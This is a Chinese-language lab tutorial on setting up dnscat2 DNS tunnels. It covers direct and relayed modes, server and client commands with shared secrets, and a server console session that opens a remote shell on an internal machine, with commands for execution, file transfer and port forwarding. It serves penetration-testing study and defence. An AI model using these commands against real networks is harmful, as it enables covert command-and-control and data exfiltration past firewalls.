0x01 前言
DNS是用來做域名解析的,是連線網際網路的關鍵,故即使是企業內網,在防火牆高度關閉下,也有著很好的連通性,但是黑客卻可以通過將其他協議的內容封裝再DNS協議中,然後通過DNS請求和響應來傳輸資料和完成控制。
0x02 DNS隧道的方式
目前DNS隧道目前按照連線方式來分:直連隧道和中繼隧道。
直連隧道:使用者直接和控制伺服器通過DNS連線,由於直連不經過其他DNS伺服器,所以速度快,但是很多使用者是對DNS伺服器是有配置要求的,只能配置特定的伺服器,配置其他的DNS伺服器不准許;另外這種方式由於直接連線的,很容易暴漏攻擊伺服器。
中繼隧道:利用DNS迭代查詢方式,中間通過多個DNS伺服器的跳轉,跳轉到最終的控制機,整個解析過程更長,所以效能沒有直連好,還要防止DNS快取。
在兩種DNS 隧道中,用的最多的是中繼方式,能讓DNS伺服器做遞迴查詢,則需要每次查詢均採用不同域名的,一句話是每次採用新域名的方式來保證走DNS查詢,有較高的隱蔽性。
同時在大多數滲透場景中伺服器端是無法連線到內網客戶端的,因為防火牆或NAT內網原因,所以多是通過客戶端定時連線伺服器端來保持狀態。
本次實驗中,我們的關注點在Dnscat2所搭建的DNS隧道,故不作方式上的研究。
0x03 整體環境
本次我們採用攻擊機-Windows DNS伺服器-內網機,由於是DNS隧道,故防火牆全開並不受影響。
攻擊機Kali
IP:10.10.10.10
DNS:10.10.10.100
Windows Service DNS伺服器:
域名:www.qianxin.com IN NS ns.baidu.com ns.baidu.com IN A 10.10.10.20
內網機Kali:已開啟防火牆
IP:10.10.10.20
DNS:10.10.10.100
0x04 安裝部署
服務端配置
安裝ruby,下載dnscat2,配置服務端依賴環境,通過ruby ./dnscat2.rb測試是否安裝成功。
#linux下伺服器端安裝
#安裝ruby
yum install ruby #伺服器端為ruby開發,所以需要先安裝ruby才可以執行
git clone https://github.com/iagox86/dnscat2.git /opt/DNSCAT2/ #下載
cd dnscat2/server/ #進入服務端目錄
gem install bundler #安裝bindle捆綁程式
sudo bundle install #bundle執行限制在非root使用者下,不過可以sudo進行root下安裝
ruby ./dnscat2.rb
如果不以root使用者身份執行它,則可能無法偵聽UDP / 53(可以使用--dnsport進行更改)。如果是這樣,您會看到一條錯誤訊息。
客戶端配置
編譯客戶端應該非常簡單-只需編譯make / gcc(對於Linux)或Cygwin或Microsoft Visual Studio(對於Windows)即可。這是Linux上的命令:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make #編譯
./dnscat 測試
到這裡的話,服務端和客戶端基本上都配置好了,不過部分環境可能會出現依賴缺少的情況,通過以下命令可以補全
#缺了不少庫採用以下方式安裝
gem install ecdsa
gem install sha3
gem install salsa20
gem install trollop
gem install trollop
0x05 操作使用
首先,先啟動服務端,服務端會進行監聽埠
ruby ./dnscat2.rb ns.baidu.com --secret=hopeamor --no-cache
語言 程式 委派域名 密碼
再啟動客戶端,此處先啟動同樣可行,不過需要注意的是–dns server=www.baidu.com不可以填寫成ns.baidu.com,這裡的引數是解析dns權威伺服器,而不是上級委派伺服器。
./dnscat --dns server=www.baidu.com --secret=hopeamor
程式
接下來,我們在服務端輸入如下命令即可
#進入互動狀態
session -i 1
#輸入shell進入互動
command (localhost.localdomain) 1> shell
Sent request to execute a shell
command (localhost.localdomain) 1> New window created: 2
Shell session created!
#看下shell資訊
dnscat2> windows
0 :: main [active]
crypto-debug :: Debug window for crypto stuff [*]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = [*]
1 :: command (localhost.localdomain) [encrypted and verified]
2 :: sh (localhost.localdomain) [encrypted and verified] [*]
#切換到shell
dnscat2> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
#輸入命令:
sh (localhost.localdomain) 2> pwd
sh (localhost.localdomain) 2> /home/test/dns2cat/dnscat2/client
這時已經完成了連線,跳轉至客戶端可以看到已經成功連線上了。
我們在服務端輸入ifconfig進行測試,可以看到客戶端資訊,當然,可以做很多事情。
連線之後有諸多命令,以下記錄了各個命令的使用,在command中使用?調出幫助。
quit(退出控制檯)
kill <id>(中斷通道)
set(設定,比如設定security=open)
windows(列舉出所有的通道)
window -i <id>(連線某個通道)或者使用session -i <id>
clear(清屏)
delay(修改遠端會話超時時間)
exec(執行遠端機上的程式)
shell(得到一個反彈shell,此處必須在1::command(kali)中使用)
download/upload(兩端之間上傳下載檔案)
supend(返回到上一層,快捷鍵ctrl+z即可)
listen <本地埠> <控制端IP/127.0.0.1>:<埠>(埠轉發,此處)(此處必須在1::command(kali)中使用)
加註:
本人在使用時,配置好的NS域名卻在資料中發現走的是直連模式,也就是攻擊機到受害機的DNS協議,結果發現是客戶端命令用的直連模式,此處使用中繼命令即可,不同的是直連命令下,只能只有ip或a解析,但中繼模式下卻能進行ns解析的二級域名,並且直連和中繼是互通的。
服務端命令:
#啟動
sudo ruby./dnscat2.rb ns.abc.com --secret=123456 #方式1【常用】中繼模式
sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=533,type=TXT --secret=123456 #方式2直連模式
sudo ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache #方式3中繼
客戶端命令:
dnscat --secret=123456 abc.com #對應 方式1中繼模式
dnscat --dns server=<your dnscat2 server ip>,port=553,type=TXT #對應 方式2,注意使用--dns選項時,port不可省,否則可能連不上,直連模式
–secret 定義了通訊密碼。
兩端使用時,均需跟上該密碼,可防止中間人攻擊。如果不加,dnscat2會生成一個隨機字串,記得拷貝下來在啟動客戶端時使用。
同時服務端在執行時,也可通過set secret=<new value>來動態改變
–security 規定了安全級別
預設情況下,客戶端和伺服器都支援並會嘗試加密。Open表示服務端允許客戶端不加密,這樣,客戶端就可以通過傳遞–no-encryption引數來禁用加密。當然也可以在編譯時,就禁用客戶端加密:make nocrypto。
同時服務端在執行時,也可通過set security=open來動態改變。
–no-cache 禁止快取
使用powershell-dnscat2客戶端時,務必在執行伺服器時新增無快取選項,因為與dnscat2伺服器的caching模式不相容。